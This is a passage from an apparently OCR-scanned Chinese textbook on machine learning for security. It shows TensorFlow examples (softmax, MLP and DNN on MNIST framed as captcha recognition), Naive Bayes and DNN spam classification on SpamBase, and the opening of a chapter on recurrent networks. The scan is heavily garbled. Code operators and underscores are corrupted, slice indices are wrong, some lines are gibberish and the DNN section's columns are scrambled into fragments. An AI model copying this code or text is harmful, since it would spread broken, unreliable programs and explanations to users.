training data, valid data, test data - pickle.load(fp) 
return training data, valid data, test data 
































其 中 各 个 返回 集合 分 别 为 : 
‘training qdata， 训 练 数据 集合 ; 
` valid_data， 校 验 数 据 集合 ; 

- test_data， 测 试 数据 集合 。 


加 载 数据 ， 并 针对 标记 数据 转换 成 one-hot 编 码 。 





training data, valid data, test dat-load data() 
x training data,y training data-training data 
xl,yl-test dat 
y training data-get one hot(y training data) 
yl-get one hot(yl) | ü 


























2. 训 练 


我 们 使 用 经 典 的 softmax 回 归 算法 来 处 理 ， 如 图 15-9 所 示 。 
softmax 算 法 的 数学 化 的 表现 为 : y=softmax (Wx+b) 


使 用 TensorFlow 的 计算 模型 展现 处 理 过 程 ， 如 图 15-10 所 示 。 








图 15-9 ”TensorFlow 官 网 对 softmax 算 法 的 图 解 


Softmax 


MatMul 





图 15-10 ”TensorFlow 计 算 模 型 示例 图 


使 用 placeholder 浮 数 设置 占 位 符 ， 用 于 定义 整个 数据 流 的 输入 和 输出 。 在 这 个 例子 中 x 和 _y 都 是 这 种 情况 ， 其 中 ，x 对 应 整个 系统 输入 ， 是 一 个 维度 为 784 的 向 量 集合 ， 且 长 度 不 限制 ，_y 是 整个 系统 的 
输出 ， 对 应 一 个 维度 为 10 的 向 量 集合 ， 两 者 的 特征 数据 类 型 都 是 浮 点 型 : 











x = tf.placeholder("float", [None, 784]) 
y = tf.placeholder("float", [None,10]) 




















定义 整个 系统 中 的 变量 ， 包 括 W、b， 初 始 化 均 为 0。 整 个 系统 的 操作 为 y=softmax (Wx+b) ，x 的 维度 为 784， 所 以 W 为 一 个 784 乘 以 10 的 数组 ，b 是 一 个 维度 为 10 的 向 量 : 











tf.Variable(tf.zeros([784,10])) 
tf.Variable (tf.zeros([10])) 


























Oo 三 





XE SEE NIRE FERÉN : 














y = tf.nn.softmax(tf.matmul(x,W) + b) 





EMMA, BAR MAASAI, WIE SERIAL. FSR Ec MOS SONS : 








cross entropy = -tf.reduce sum(y *tf.log(y)) 
train step = tf.train.GradientDescentOptimizer (0.01) .minimize (cross entropy) 














初始 化 全 部 变量 并 定义 会 话 ， 在 TensorFlow 中 每 个 会 话 都 是 独立 的 ， 相 互 不 干扰 。 





init = tf.initialize all variables () 
sess = tf.Session() 
sess.run(init) 

















在 理想 情况 下 ， 我 们 希望 用 所 有 的 数据 来 进行 每 一 步 的 训练 ， 因 为 这 能 给 我 们 更 好 的 训练 结果 ， 但 显然 这 需要 很 大 的 计算 开销 。 所 以 ， 每 一 次 训练 我 们 可 以 使 用 不 同 的 数据 子 集 ， 这 样 做 既 可 以 减少 计 
算 开 销 ， 又 可 以 最 大 化 地 学 习 到 数据 集 的 总 体 特性 。 我 们 定义 每 次 训练 的 数据 子 集 的 个 数 : 





batch size-100 


每 次 我 们 都 顺序 取出 100 个 数据 用 于 训练 ， 便 于 梯度 下 降 算 法 快速 收敛 ， 整 个 训练 次 数 取 决 于 整个 数据 集合 的 长 度 以 及 每 次 训练 的 数据 个 数 : 











for i in range(int(len(x training data)/batch size)): 
batch xs-x training data[(i*batch size):((i*1)*batch size)] 
batch ys-y training data[(i*batch size):((i*1)*batch size) 
sess.run(train step, feed dict-(x: batch xs, y : batch ys]) 
































3. 验 证 


TensorFlow 的 数据 验证 非常 简单 ， 使 用 自 带 的 API 即 可 : 








correct prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y , 1)) 
accuracy = tf.reduce mean(tf.cast(correct prediction, tf.float32)) 
print(sess.run(accuracy, feed dict-(x: xl, y : y1])) 









































运行 结果 如 下 ， 准 确 率 约 为 9096 : 








can't determine number of CPU cores: assuming 4 

I tensorflow/core/common runtime/local device.cc:25] Local device intra op parallelism threads: 4 
can't determine number of CPU cores: assuming 4 
I tensorflow/core/common runtime/local session.cc:45] Local session inter op parallelism threads: 4 
0.9097 




































































15.5 示例 : 在 TensorFlow 下 识别 验证 码 (Z) 


完整 演示 代码 请 见 本 书 GitHub 上 的 15-2.py。 

1. 数 据 清洗 与 特征 提取 

我 们 依然 使 用 M NIST 数 据 集合 和 TensorFlow 的 多 层 感知 机 ， 同 样 利用 one-hot 编 码 处 理 标记 数据 。 
2. 训 练 

我 们 使 用 多 层 感知 机 来 处 理 。 


使 用 TensorFlow 的 计算 模型 展现 处 理 过 程 ， 如 图 15-11 所 示 。 


Softmax 





Add 


MatMul 





Add 


MatMul 





图 15-11 TensorFlow 计 算 模 型 示例 图 


使 用 placeholder 函 数 设 置 占 位 符 ， 用 于 定义 整个 数据 流 的 输入 和 输出 。 在 这 个 例子 中 x 和 _y 都 是 这 种 情况 ， 其 中 ，x 对 应 整个 系统 输入 ， 是 一 个 维度 为 784 的 向 量 集合 ， 且 长 度 不 限制 ;_y 是 整个 系统 的 
输出 ， 对 应 一 个 维度 为 10 的 向 量 集合 ， 两 者 的 特征 数据 类 型 都 是 浮 点 型 ; 另外， 需要 定义 drop_out 的 比例 keep_prob， 同 样 也 是 浮 点 型 。 





















































x = tf.placeholder("float", [None, 784]) 
y = tf.placeholder("float", [None,10]) 
keep prob-tf.placeholder (tf.float32) 


定义 整个 系统 中 的 变量 W1、b1、W2、b2， 其 中 隐藏 层 具有 300 个 节点 。 
























































in units-784 

hl units-300 
Wl-tf.Variable(tf.truncated normal([in units,hl units],stddev-0.1)) 
bl-tf.Variable(tf.zeros([hl units])) 

W2-tf.Variable(tf.zeros([hl units,10])) 
b2-tf.Variable(tf.zeros([10])) 




















定义 整个 系统 的 操作 函数 ， 其 中 隐藏 层 有 一 层 ， 使 用 relu 遂 数 生 成 : 








hiddenl-tf.nn.relu(tf.matmul (x,W1)+b1) 
hiddenl drop-tf.nn.dropout (hiddenl, keep prob) 


y = tf.nn.softmax(tf.matmul(hiddenl drop,W2) + b2) 






































EMMA, BARRA RSS, A AdagradE EMA, 52J3585:730.3: 

















cross entropy = tf.reduce mean(-tf.reduce sum(y *tf.log(y),reduction indices-[1])) 


train step = tf.train.AdagradOptimizer(0.3).minimize(cross entropy) 

















初始 化 全 部 变量 并 定义 会 话 ， 在 TensorFlow 中 每 个 会 话 都 是 独立 的 ， 互 不 干扰 : 








init = tf.initialize all variables () 
sess = tf.Session() 
sess.run(init) 














我 们 定义 每 次 训练 的 数据 子 集 的 个 数 : 





batch size-100 





每 次 我 们 都 顺序 取出 100 个 数据 用 于 训练 ， 便 于 梯度 下 降 算法 快速 收敛 ， 整 个 训 | 练 的 次 数 取决 于 整个 数据 集合 的 长 度 以 及 每 次 训练 的 数据 个 数 ， 其 中 keep_prob 比 例 为 75%: 








for i in range(int(len(x training data) /batch size)): 
batch xs-x training data[(i*batch size): ((i+1) *batch_size) ] 
batch ys-y training data[(i*batch size):((i*1)*batch size)] 
sess.run(train step, feed dict-(x: batch xs, y : batch ys,keep prob:0.75]) 



































3. 验 证 


TensorFlow 的 数据 验证 非常 简单 ， 使 用 自 带 的 API 即 可 : 














correct prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y , 1)) 
accuracy = tf.reduce mean(tf.cast(correct prediction, tf.float32)) 
print(sess.run(accuracy, feed dict={x: xl, y : yl,keep prob:1.0])) 



































运行 结果 如 下 ， 准 确 率 约 为 96% ， 准 确 率 提升 不 少 ， 这 就 是 神经 网 络 的 魅力 。 








can't determine number of CPU cores: assuming 4 

I tensorflow/core/common runtime/local device.cc:25] Local device intra op parallelism threads: 4 
can't determine number of CPU cores: assuming 4 
I tensorflow/core/common runtime/local session.cc:45] Local session inter op parallelism threads: 4 
0.9601 




































































15.6 示例 : 在 TensorFlow 下 识别 验证 码 (=) 


完整 演示 代码 请 见 本 书 GitHub 上 的 15-3.py 
1. 数 据 清洗 与 特征 提取 


我 们 依然 使 用 MNIST 数 据 集合 和 TensorFlow 的 DNN (如 图 15-12 所 示 ) ， 同 样 使 用 one-hot 编 码 处 理 标记 数据 。 


2. 训 练 


我 们 使 用 DNN 模 型 进行 计算 ， 使 用 placeholder 函 数 设置 占 位 符 ， 用 于 定义 整个 数据 流 的 输入 和 输出 。 在 这 个 例子 中 x 和 _y 都 是 这 种 情况 ， 其 中 ，x 对 应 整个 系统 输入 ， 是 一 个 维度 为 784 的 向 


长 度 不 限制 ，_y 是 整个 系统 的 输出 ， 对 应 一 个 维度 为 10 的 向 


x = tf.placeholder ("fl 














y = tf.placeholder ("f 











keep prob=tf.placehol 














[None, 784]) 


t", [None,10]) 








tf£.float32) 











定义 整个 系统 中 的 变量 








， 其 中 有 3 个 隐藏 层 : 




















ena 
量 集合 ， 










































































s])) 


in units-784 

out units-10 

hl units-300 

h2 units-200 

h3 units-100 

Wl-tf.Variable(tf 

bl=tf.Variable(tf.zeros([hl units])) 
W2-tf.Variable(tf.zeros([hl units,h2 unit 
b2-tf.Variable(tf.zeros([h2 units])) 
W3-tf.Variable(tf.zeros([h2 units,h3 units])) 
b3-tf.Variable(tf.zeros([h3 units])) 
WA-tf.Variable(tf.zeros([h3 units,out units])) 
b4-tf.Variable(tf.zeros([out units])) 




















.truncated normal([in units,hl units],stddev-0.1)) 


定义 整个 系统 的 操作 函数 ， 其 中 隐藏 层 有 3 层 ， 使 用 relu 遂 数 生 成 : 






































hiddenl-tf.nn.relu(tf.ma 
hidden2-tf.nn.relu(tf.ma 
hidden3-tf.nn.relu(tf.ma 
hidden drop-tf.nn.dropou! 
y = tf.nn.softmax (t 


tmul (x, W1) +b1) 


tmul (hiddenl,W2) 4 





























Hb2) 





tmul (hidden2,W3) 4 
t (hidden3, keep prob) 
tf.matmul (hidden drop,W4) + b4) 


Hb3) 








图 15-12 3 层 DNN 示 意图 


两 者 的 特征 数据 类 型 都 是 浮 点 型 ; 


定义 衰减 函数 ， 这 里 的 衰减 函数 使 用 交叉 炳 来 衡量 ， 通 过 Adagrad 自 适应 调节 ， 学 习 速 率 为 0.3: 


cross entropy tf.reduce mean (-ti 

















train step - tf. 


初始 化 全 部 变量 并 定义 会 话 ， 在 TensorFlow 中 每 个 会 话 都 是 独立 的 ， 互 不 干扰 : 











init = t 





F.initialize all variables() 














Sess — 


tf.Session() 


f.reduce sum(y *t1 


sess.run(init) 


我 们 定义 每 次 训练 的 数据 子 集 的 个 数 : 


batch size-100 


每 次 我 们 都 顺序 取出 100 个 数据 用 于 训练 ， 便 于 梯度 下 降 算 法 快速 收敛 ， 整 个 训练 的 次 数 取决 于 整个 数据 集合 的 长 度 以 及 每 次 训练 的 数据 个 数 ， 其 中 keep_prob 比 例 为 7596: 





for i in range (int (len(x : 








batch xs-x training dat 











batch ys-y training da 
sess.run(train step, 


3. 验 证 





a[ (i*bat 





tch size):((i* 





ta[ (i*bat 
feed dict={x: batch xs, y : 


tch size): ( (141 





training data)/batch size)): 
1) *bat 





t.log(y),reduction indices-[1])) 





train.AdagradOptimizer(0.3).minimize(cross entropy) 


tch size)] 





L) *bat 


TensorFlow 的 数据 验证 非常 简单 ， 使 用 自 带 的 API 即 可 : 


correct prediction = tí 











accuracy = tf.reduce mean (ti 


F.equal (t1 











print (sess.run (accuracy, 











f.cast (correct predic 
feed dict={x: x1, y : yl 





tch size) ] 


f.argmax(y, 1), tf.argmax(y , 1)) 





tion, t 





.float32) ) 











l, keep prob:1.0})) 


batch ys, keep prob:0.75}) 


2, 


需要 定义 drop_out 的 比例 keep_prob， 同 样 也 是 浮 点 型 : 





Emu. A 
量 集合 ， 


且 


运行 结果 如 下 ， 准 确 率 约 为 93%， 可 见 并 非 深度 学 习 就 一 定 效果 好 ， 当 数据 量 不 大 时 ，SVM 的 效果 很 有 可 能 优 于 深度 学 习 





can't determine number of CPU cores: assuming 4 
I tensorflow/core/common | runtime/local device.cc:25] Local device intra op parallelism threads: 4 
can't determine number of CPU cores: assuming 4 
tensorflow/core/common runtime/local session.cc:45] Local session inter op parallelism threads: 4 
0.9361 













































































15.7 示例 : 在 TensorFlow 下 识别 垃圾 邮件 (一 ) 


完整 演示 代码 请 见 本 书 GitHub 上 的 15-4.py。 

1 .数据 清洗 与 特征 提取 

垃圾 邮件 是 信息 时 代 的 副产品 ， 具 有 以 下 危害 : 

:占用 网 络 带 宽 ， 造 成 邮件 服务 器 拥塞 ， 进 而 降低 整个 网 络 的 运行 效率 。 

` 侵犯 收 件 人 的 隐私 权 ， 侵占 收 件 人 信箱 空间 ,耗费 收 件 人 的 时 间 、 精 力 和 人 金钱。 有 的 垃圾 邮件 还 盗用 他 人 的 电子 邮件 地 址 作为 发 信 地 址 ， 严 重 损害 了 他 人 的 信誉 


* 被 黑客 利用 成 为 助 结 为 虐 的 工具 。2000 年 2 月 ， 黑 客 攻 击 雅 虎 等 五 大 热门 网 站 就 是 一 个 例子 。 黑 客 先是 侵入 并 控制 了 一 些 高 带宽 的 网 站 ， 集 中 众 务 器 的 带宽 能 力 ， 然 后 用 数 以 亿 万 计 的 垃圾 邮件 猛 
ARE AR, SERRA SAMBA R, 最终 瘫 痰 。 


- 严重 影响 ISP 的 服务 形象 。 在 国际 上 ， 频 繁 转 发 垃圾 邮件 的 主机 会 被 上 级 国际 因特网 服务 提供 商 列 入 国际 垃圾 邮件 数据 库 ， 从 而 导致 该 主机 不 能 访问 国外 许多 网 站 。 而 且 收 到 垃圾 邮件 的 用 户 会 因为 
ISP 没 有 建立 完善 的 垃圾 邮件 过 滤 机 制 ， 而 转向 其 他 ISP。 一 项 调查 表明 : ISP 每 争取 一 个 用 户 要 花费 75 美 元 ,但 是 每 年 因 垃 圾 邮件 要 失去 7.2% 的 用 户 。 


` 妖言 惑 众 、 骗 人 钱财 、 传 播 色情 等 内 容 的 垃圾 邮件 ， 已 经 对 现实 社会 造成 了 危害 。 


我 们 使 用 SpamBase 这 个 入 门 级 的 垃圾 邮件 分 类 训练 集 来 测试 。SpamBase 的 数据 不 是 原始 的 邮件 内 容 而 是 已 经 特征 化 的 数据 ， 对 应 的 特征 是 统计 的 关键 字 以 及 特殊 符号 的 词 频 ， 一 共 58 个 属性 ， 其 中 
最 后 一 个 是 垃圾 邮件 的 标记 位 ， 如 图 15-13 所 示 。 特 征 数据 结构 举例 如 下 : 



































word freq make: continuous. 
word freq address: continuous. 
word freq all: continuous. 
word freq 3d: continuous. 
word freq our: continuous. 
word freq over: continuous. 
word freq remove: continuous. 
word freq internet: continuous. 
word freq order: continuous. 
word freq mail: continuous. 
word freq receive: continuous. 
word freq will: continuous. 
word freq people: continuous. 
word freq report: continuous. 
word freq addresses: continuous. 








word freq address 
word freq all 
word freq 3d 
word freq our 
word freq over 
word freq remove 
word freq internet 


word freq order 





图 15-13 ”SpamBase 数 据 集 特征 抽取 过 程 


数据 来 源 为 4601 封 邮件 ， 其 中 1813 封 为 垃圾 邮件 ， 数 据 内 容 举例 如 下 : 





0,0,0,0,0,0,0,0,0,0,0,0,0,0,0.778,0,0,3.756,61,278,1 0.21,0.28,0.5,0,0.14,0.2€ 


0,0.64,0.64,0,0.32,0,0,0,0,0,0,0.64,0,0,0,0.32,0,1.29,1.93,0,0.96,0,0,0,0,0,0,0,0,0, , 
,1028,1 


0.43,0.43,0,0,0,0,0,0,0,0,0,0,0,0,0.07,0,0,0,0,0,0,0,0,0,0,0,0,0.132,0,0.372,0.18,0. 





加 载 SpamBase 数 据 集 ， 使 用 豆 ， 并 且 转 换 成 数值 型 : 








with open(filename) as f: 
for line in f: 

line=line.strip('\n') 
v=line.split(',' 
y. append (int 























for i in range(57): 
t.append (float (v[i])) 
t-np.array (t) 

x.append (t) 
x-np.array (x) 
y-np.array (y) 








随机 划分 数据 集 为 训练 集 和 测试 集 ， 其 中 测试 集 占 40%: 





X train, x test, y train, y test-train test split( x,y, test size=0.4, random state=0) 





return x train, x test, y train, y test 








2. 训 | 练 


训练 与 验证 过 程 如 图 15-14 所 示 。 


使 用 朴素 贝 叶 斯 算法 进行 训练 : 





一 


gnb = GaussianNB () 








y predict = gnb.fit(x train, y train).predict(x test) 


训练 过 程 | 邮件 内 容 提取 特征 









验证 过 程 | 邮件 内 容 





3. 验 证 


使 用 测试 数据 集 进行 分 类 ， 得 到 分 类 结果 y_predict， 将 y_predict 与 训练 测试 集 的 标记 y_test 进 行 比 对 ， 得 到 测试 结果 : 









提取 特征 





标记 是 否 垃圾 邮件 


57 维特 征 


word freq address 
word freq all 
word freq 3d 
word freq our 


word freq over 
word freq remove 
word freq internet 
word freq order 





57 维特 征 






word freq address 
word freq all 
word freq 3d 
word freq our 
word freq over 
word freq remove 
word freq internet 
word freq order 


NB/DNN 训练 


NB/DNN 分 类 器 





图 15-14 SpamBase 垃 圾 邮件 训练 与 验证 过 程 





标记 是 否 垃圾 邮件 





Score = metrics.accuracy Score (y test, y predict) 
print('Accuracy: {0:f}'.format (score) ) 














测试 结果 准确 率 约 为 8296: 





Accuracy: 0.826181 


15.8 示例 : 在 TensorFlow 下 识别 垃圾 邮件 (Z) 


完整 演示 代码 请 见 本 书 GitHub 上 的 15-5.py。 


1 .数据 清洗 与 特征 提取 


我 们 尝试 使 用 DNN 算 法 进行 训练 与 分 类 ， 数 据 清洗 与 特征 提取 方式 与 上 例 一 致 。 


2. 训 | 练 


我 们 使 用 TensorFlow 提 供 的 Scikit-Learn 风 格 的 接口 ， 相 对 于 TensorFlow 原 生 的 API 接口 ，Scikit-Learn 风 格 的 接口 更 加 简洁 ， 比 如 构造 多 层 隐 藏 层 时 ， 只 要 设置 即 可 ， 不 用 反复 调用 创建 隐藏 层 的 函 
以 创建 两 层 隐藏 层 的 DNN 为 例 : 


YE 
= 











x train, x test, y train, y test-load SpamBase ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/spambase/spambas 
feature columns - tf.contrib.learn.infer real valued columns from input(x train) 

classifier = tf.contrib.learn.DNNClassifier( 

feature columns-feature columns, hidden units-[30,10], n classes-2) 



























































其 中 hidden_units=[30，10] 表 明 具 有 两 层 隐藏 层 ， 每 层 节点 数 分 别 为 30 和 10。 对 训练 集合 进行 训练 ， 其 中 steps=500 表 明 训 练 500 个 批 次 ，batch_size=10 表 明 每 个 批 次 有 10 个 训练 数据 : 











classifier.fit(x train, y train, steps=500, batch size-10) 
y predict-list(classifier.predict(x test, as iterable-True)) 




















3. 验 证 


使 用 测试 数据 集 进 行 分 类 ， 得 到 分 类 结果 y_predict， 将 y_predict 与 训练 测试 集 的 标记 y_ test 进行 比 对 ， 得 到 测试 结果 : 


score = metrics.accuracy Score (y test, y predict) 
print('Accuracy: {0:f£}'.format (score) ) 














测试 结果 准确 率 约 为 87%， 比 朴素 贝 叶 斯 略 好 : 


Accuracy: 0.866377 





15.9 ”本 章 小 结 


本 章 重 点 介绍 了 TensotrFlow 入 门 知识 以 及 多 层 感 知 机 与 DNN 算 法 的 基础 知识 ， 我 们 在 使 用 相同 的 垃圾 邮件 训练 数据 集合 和 相同 的 特征 提取 方式 的 情况 下 ， 对 比 了 朴素 贝 叶 斯 和 DNN 的 检测 效果 ，DNN 略 
好 。 虽 然 这 是 一 个 不 严谨 的 对 比 ， 因 为 两 种 算法 都 有 优化 空间 ， 但 是 确实 也 能 说 明 一 定 的 问题 ， 使 我 们 第 一 次 实际 感受 到 了 深度 学 习 的 魅力 。 
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我 写作 本 章 时 参考 了 以 下 网 站 ， 读 者 要 想 进一步 学 习 ， 欢 迎 到 这 些 网 站 进一步 了 解 更 多 信息 : 
- https://github.com/tensorflow/tensorflow/tree/master/tensorflow / examples /leatn 
: https://www.tensorflow.org/get_started/tflearn 
: http://tflearn.org/examples / 
: https://github.com/tflearn/tflearn/blob/master/examples/nlp/ 
- https://github.com/jikexueyuanwiki/tensorflow-zh 


: http://tech.sina.com.cn/it/2015-11-12/doc-ifxksqiv8295057.shtml 


党 


还 有 一 些 参考 文献 值得 一 读 : 
[1] D Ciresan, U Meier, L M Gambardella, J Schmidhuber.Convolutional Neural Network Committees for Handwritten Character Classification.International Conference on Document Analysis&Recognition, 2011: 


1135-1139. 


[2] P Simard, D Steinkraus, J Platt.Best Practices for Convolutional Neural Networks Applied to Visual Document Analysis.International Conference on Document Analysis&Recognition, 2003: 958. 


[3] 黄 文 坚 ， 唐 源 .TensotFlow 实 战 [IM. 北 京 : 电子 工业 出 版 社 ，2017. 


第 16 章 ”循环 昼 经 网 络 算法 


之 前 我 们 介绍 了 适合 处 理 时 序数 据 的 HMM 模 型 ， 本 章 我 们 将 继续 介绍 其 中 的 一 员 大 将 : 循环 神经 网 络 算法 。 循 环 神经 网 络 算法 通过 特殊 的 结构 使 得 自身 具有 了 记忆 性 ， 可 以 使 用 记忆 更 好 地 进行 判断 ， 
因此 在 自然 语言 处 理 、 信 号 处 理 、 情 感 识 别 等 领域 具有 广泛 应 用 。 人 们 甚至 已 经 实现 让 循环 神经 网 络 学 习 ， 然 后 自动 生成 代码 和 写 诗 作画 。 


本 章 介 绍 循环 神经 网 络 算法 的 基本 概念 ， 通 过 案例 讲解 如 何 使 用 循环 神经 网 络 算法 来 识别 基于 MNIST 数 据 集 的 验证 码 ， 识 别 恶意 负 面 评论 ， 学 习 现 有 城市 名 称 的 特点 自动 生成 城市 名 称 ， 识 别 


WebShell， 通 过 学 习 常 用 密码 自动 生成 常用 密码 ， 识 别 异 常 操作 等 。 


16.1 循环 神经 网 络 算法 概述 


Ew 2 


古人 云 温 故 而 知 新 ( 见 图 16-1) ， 我 们 在 分 析 事 物 的 时 候 总 会 结合 自身 以 前 的 经 历 ， 即 使 遇 到 从 未 见 过 的 情况 ， 也 会 尽量 回忆 以 前 类 似 场景 下 是 如 何 解 决 的 ， 这 个 其 实 就 和 循环 神经 网 络 的 思路 一 致 。 





循环 神经 网 络 (Recurrent Neural Networks, RNN) 算法 是 深度 学 习 算 法 中 非常 有 名 的 一 种 算法 。RNN 之 所 以 称 为 循环 神经 网 络 ， 是 因为 一 个 序列 当前 的 输出 与 前 面 的 输出 有 关 。 具 体 的 表现 形式 


A: 网 络 会 对 前 面 的 信息 进行 记忆 并 应 用 于 当前 输出 的 计算 中 ， 即 隐藏 层 之 间 的 节点 不 再 无 连接 而 是 有 连接 的 ， 并 且 隐 藏 层 的 输入 不 仪 包 括 输入 层 的 输出 还 包括 上 一 时 刻 隐藏 层 的 输出 。 理 论 上 ，RNN 能 
对 任何 长 度 的 序列 数据 进行 处 理 。 但 是 在 实践 中 ， 为 了 降低 复杂 性 往往 假设 当前 的 状态 只 与 前 面 的 几 个 状态 相关 。 


RNN 的 独特 能 力 来 自 于 它 特殊 的 结构 ， 如 图 16-2 所 示 ，x 代 表 输 入 ，h 代 表 输 出 ， 输 出 的 一 部 分 会 作为 输入 的 一 部 分 重新 输入 ， 于 是 RNN 具 有 了 一 定 的 记忆 性 。 
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图 16-1 温 故 而 知 新 


把 RNN 神 经 元 展开 来 分 析 ，RNN 等 效 于 一 连 串 共享 系数 的 神经 元 串联 在 一 起 ， 如 图 16-3 所 示 ， 这 也 就 解释 了 RNN 特 别 适合 处 理 时 序数 据 的 原因 。 





图 16-2 RNN 结 构 示 例 图 (一 ) 





图 16-3 RNN 结 构 示 例 图 (二 ) 


但 是 生活 的 经 验 告诉 我 们 ， 在 比较 复杂 的 情况 下 ， 只 分 析 时 序数 据 的 最 近 几 个 数据 是 难以 得 到 合理 的 结果 的 ， 需 要 更 长 的 记忆 来 追根 溯源 ， 于 是 就 有 了 LSTM (Long Short Term Memory) ，LSTM 可 
以 在 更 长 的 时 间 范 围 内 分 析 时 序数 据 ， 如 图 16-4 所 示 。 针 对 LSTM 的 详细 描写 请 参考 经 典 文 章 : http://colah.GitHub.io/posts/2015-08-Understanding-LSTMs/ 








图 16-4 RNN 之 LSTM 示 例 图 


16.2 示例: 识别 验证 码 


完整 演示 代码 请 见 本 书 GitHub 上 的 16-1.py。 
1 数据 清洗 与 特征 化 


我 们 继续 使 用 M NIST 数 据 集 ，M NIST 数 据 集 详细 介绍 请 阅读 第 3 章 相 关内 容 。 这 次 ， 我 们 利用 TFLearn 提 供 的 APl 来 获取 M NIST 数 据 集 : 





X, Y, testX, testY = mnist.load data(one hot-True) 


第 一 次 调用 这 个 API 的 时 候 ， 会 自动 下 载 M NIST 数 据 集 到 默认 目录 : 











































































































































































































Downloading MNISThttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 
Succesfully downloaded train-images-idx3-ubyte.gz 9912422 bytes. 

Extracting mnist/train-images-idx3-ubyte.gz 

Downloading MNISThttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 
Succesfully downloaded train-labels-idxl-ubyte.gz 28881 bytes. 

Extracting mnist/train-labels-idxl-ubyte.gz 

Downloading MNISThttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 
Succesfully downloaded t10k-images-idx3-ubyte.gz 1648877 bytes. 

Extracting mnist/t10k-images-idx3-ubyte.gz 

Downloading MNISThttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 
Succesfully downloaded t10k-labels-idxl-ubyte.gz 4542 bytes. i 

Extracting mnist/t10k-labels-idxl-ubyte.gz 









































后 继 再 调用 该 API 时 会 自动 从 默认 目录 中 加 载 对 应 的 文件 : 














tracting mnist/train-images-idx3-ubyte.gz 
tracting mnist/train-labels-idxl-ubyte.gz 
tracting mnist/tlOk-images-idx3-ubyte.gz 
tracting mnist/t10k-labels-idxl-ubyte.gz 





















































其 中 需要 注意 的 是 ， 原 有 数据 集中 将 数据 标记 为 0 ~ 9， 分 别 代表 0 ~ 9 这 10 个 数字 。 在 神经 网 络 中 为 了 简化 设计 ， 一 般 将 最 后 一 层 设 计 成 0 ~ 1 型 开关 结构 ， 所 以 0 ~ 9 可 以 用 一 个 长 度 为 10 的 向 量 表 示 ， 
每 一 位 分 别 代表 不 同 的 数字 ， 这 种 编码 叫做 one-hot， 也 称 为 独 热 编码 ， 编 码 转换 关系 如 表 16-1 所 示 。 


表 16-1 MNIST 标 记 数 据 one-hot 编 码 
原 有 标记 现 有 标记 原 有 标记 现 有 标记 
0 [1,0,0,0,0,0,0,0,0,0] 0,0,0,0,0,1,0,0,0,0 


Un 


l [0,1,0,0,0,0,0,0,0,0] 0,0,0,0,0,0,1,0,0,0 


2 [0.0,1.0,0,0,0.0,0.0] 


3 [0.0,0,.1,0,0,0,0,0.0] 0,0,0,0,0,0,0,0,1,0 


o Oo ~ O 


[ 
[0,0,0,0,0,0,0,1,0,0] 
[0,0,0,0,0,0,0,0,0,1] 


4 [0.0,0,0,1,0,0,0,0,0] 


原 有 的 图 片 文件 大 小 是 28x28， 在 DNN 以 及 MLP 的 案例 中 ， 我 们 将 其 转换 成 维度 为 784 的 特征 向 量 ， 如 图 16-5 所 示 。 


在 RNN 模 型 中 ， 特 别 适 合 处 理 时 序 型 数据 ， 所 以 我 们 需要 将 数据 格式 进行 转换 ， 如 图 16-6 所 示 。 


维度 为 784 的 特征 问 量 





图 16-5 ”DNN 中 针对 MNIST 数 据 的 处 理 





图 16-6 ”RNN 中 针对 MNIST 数 据 的 处 理 


在 Python 环境 下 实现 这 样 的 转换 非常 方便 ， 只 需要 调用 NumPy 的 函数 np.reshape 即 可 : 





X = np.reshape(X, (-1, 28, 28)) 
testX = np.reshape(testX, (-1, 28, 28)) 


2. 训 练 样本 


构造 RNN 神 经 网 络 ， 使 用 LSTM 算 法 。 


设置 输入 参数 的 形状 为 28x 28: 








net = tflearn.input data(shape-[None, 28, 28]) 















































设置 使 用 LSTM 算 法 : 

net = tflearn.lstm(net, 128, return seq-True) 
net = tflearn.lstm(net, 128) 

设置 全 连接 网 络 : 














net = tflearn.fully connected(net, 10, activation-'softmax') 








设置 输出 节点 ， 优 化 算法 使 用 adam， 损 失 函 数 使 用 categorical crossentropy: 








net = tflearn.regression(net, optimizer='adam', 
loss-'categorical crossentropy', name="output1") 








创建 神经 网 络 实体 : 








model = tflearn.DNN(net, tensorboard verbose-2) 


调用 fi 函数 训练 样本 : 








model.fit(X, Y, n epoch-1, validation set-0.1, show metric-True, 
snapshot step-100) 


其 中 主要 参数 的 含义 为 : 

: n_epoch， 整 个 数据 集合 训练 的 次 数 ; 

validation_set， 验 证 数据 集 的 比例 ， 也 可 以 直接 填写 集合 ， 比 如 (testX, testY) ， 
show_mettic， 是 否 展 现 完整 训练 过 程 ， 

- snapshot_step，snapshot 的 训练 步 长 。 

3. 验 证 效果 


运行 程序 I 效果 演示 如 1 6- 7 所 示 。 


og directory: /tmp/ttlearn_logs 
WARNING: tensorflow:Error encountered when serializing layer tensor/LSTM. 
Type 1S unsupported, or the types of the items don't match field type in Coll 


ectionDef. 


‘List’ object has no attribute ‘name’ 


Training E 49500 
Validation samples: 5500 


Training Step: 100 | total loss: 
| Adam | epoch: 001 | loss: 0.97388 
cc: 0.7235 -- iter: 06400/49500 


Training Step: 200 | total loss: £ 
| Adam | epoch: 001 | loss: 0.56771 
cc: 0.7884 -- iter: 12800/49500 


Training Step: 300 
| Adam | epoch: 001 | loss: 0.46674 
cc: 0.8684 -- iter: 19200/49500 


Training Step: 386 | total loss: 
| Adam | epoch: 001 | loss: 0.31694 


图 16-7 


其 中 训练 数据 集 个 数 为 55000， 测 试 数据 集合 个 数 为 10000: 


| total loss: 0.4¢ 





97388 | time: 17.408s 
- acc: @.6815 | val_loss: @.88355 - val_a 


56771 | time: 33.929s 
- acc: @.8151 | val_loss: @.62796 - val_a 


16674 | time: 52.013s 
- acc: 0,8539 | val_loss: 0.44639 - val_a 


4.31694 | time: 69.5345 


- acc: 0.9022 -- iter: 24704/49500 


RNN 识 别 MNIST 数 据 





Training samples: 55000 
Validation samples: 10000 





最 终 准 确 率 达 到 了 95% 左 右 ， 相 当 不 错 了 : 





Training Step: 860 | total loss: 0.19170 | time: 179.915s 
